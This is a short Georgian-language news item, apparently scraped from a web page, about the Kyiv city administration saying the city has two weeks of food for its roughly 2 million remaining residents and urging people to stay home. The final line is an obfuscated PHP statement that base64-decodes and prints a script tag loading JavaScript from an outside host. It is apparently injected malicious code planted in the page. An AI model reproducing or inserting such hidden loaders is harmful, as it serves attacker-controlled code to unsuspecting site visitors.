celsiusi
ავერსი საქკაბელი
კიევის საქალაქო ადმინისტრაციის ცნობით, ქალაქი მზად არის 2-კვირიანი ბლოკადისთვის. 
 
უწყება აცხადებს, რომ ქალაქში მოქალაქისთვის საკვების 2 კვირის მარაგი არსებობს. 
 
ადმინისტრაციის ცნობით, ქალაქი მზად არის, საკვებით უზრუნველყოს კიევში დარჩენილი 2 მილიონი მოქალაქე იმ შემთხვევაში, თუ ვითარება გაუარესდება. 
 
ამ ეტაპზე კიევში გახსნილია აფთიაქები და მაღაზიები. ამასთან, დედაქალაქის მცხოვრებლებს მოუწოდებენ, სახლები მხოლოდ გადაუდებელი საჭიროების შემთხვევაში დატოვონ.
 
"ქალაქი მადლობას უხდის უკრაინელ და უცხოელ პარტნიორებს, რომლებმაც შეძლეს დიდ და პატარა მაღაზიებს უმოკლეს დროში მიეწოდებინათ ყველაზე საჭირო საქონელი და მოაწყვეს მათი თითქმის შეუფერხებელი მიწოდება.
 
ამასთან, დედაქალაქში იხდიან ხელფასს და პენსიებს, ამიტომ კიევის მცხოვრებლებს ვთხოვთ, არა მხოლოდ შეიძინონ ის, რაც სჭირდებათ, არამედ გადაიხადონ კომუნალური გადასახადები და და ასევე დაეხმარეთ გარშემომყოფებს". - აცხადებს კიევის სამოქალაქო ადმინისტრაცია. 
693
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");